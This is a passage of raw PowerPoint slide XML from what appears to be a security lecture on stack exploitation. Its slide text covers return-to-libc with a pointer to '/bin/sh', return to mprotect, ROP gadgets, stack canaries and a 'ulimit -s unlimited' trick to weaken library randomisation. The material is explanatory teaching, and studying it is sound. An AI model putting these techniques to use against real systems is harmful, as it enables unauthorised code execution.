          <p:cNvPr id="36" name="TextBox 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="3315831"/>
            <a:ext cx="5334000" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Other common attack: return to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>mprotect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>and make stack executable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangular Callout 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505691" y="1447800"/>
            <a:ext cx="5305926" cy="1501273"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 60597"/>
              <a:gd name="adj2" fmla="val -20032"/>
              <a:gd name="adj3" fmla="val 16667"/>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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find an instruction sequence, aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, to calculate the address at exploit time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2842818422"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="6079"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="607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Canary / Stack Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Domestic_Canary_-_Serinus_canaria.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4" cstate="print">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId5">
                    <a14:imgEffect>
                      <a14:brightnessContrast bright="25000" contrast="10000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5876832" y="2244582"/>
            <a:ext cx="2886168" cy="2385982"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67843" y="6544632"/>
            <a:ext cx="5037557" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>en.wikipedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/wiki/File:Domestic_Canary_-_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Serinus_canaria.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1570835493"/>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747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="25" name="Table 24"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="964962920"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="4817544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argc</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ebp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> bytes)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>[1]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8003947" y="3110227"/>
            <a:ext cx="1032104" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1032104" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="761747" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>ebp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Straight Arrow Connector 27"/>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8003947" y="6097085"/>
            <a:ext cx="1006456" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1006456" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="TextBox 29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="736099" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31" name="Straight Arrow Connector 30"/>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32" name="Arc 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="5561514"/>
            <a:ext cx="685800" cy="534486"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5305641"/>
              <a:gd name="adj2" fmla="val 16471755"/>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3" name="Curved Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7983262" y="5410200"/>
            <a:ext cx="824189" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="curved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6526781" y="1447800"/>
            <a:ext cx="1474219" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6521704" y="2590800"/>
            <a:ext cx="1474219" cy="398502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447686"/>
            <a:ext cx="5638800" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>1. What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>if we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>can’t inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>”?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>Cute trick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: use address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>character followed by null byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>Cute trick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: the string  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>is present in modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> binaries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>2. What about library randomizing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>Cute trick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ulimit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> –s unlimited</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295228010"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="6079"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="607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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ret2libc</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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3893176938"/>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747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
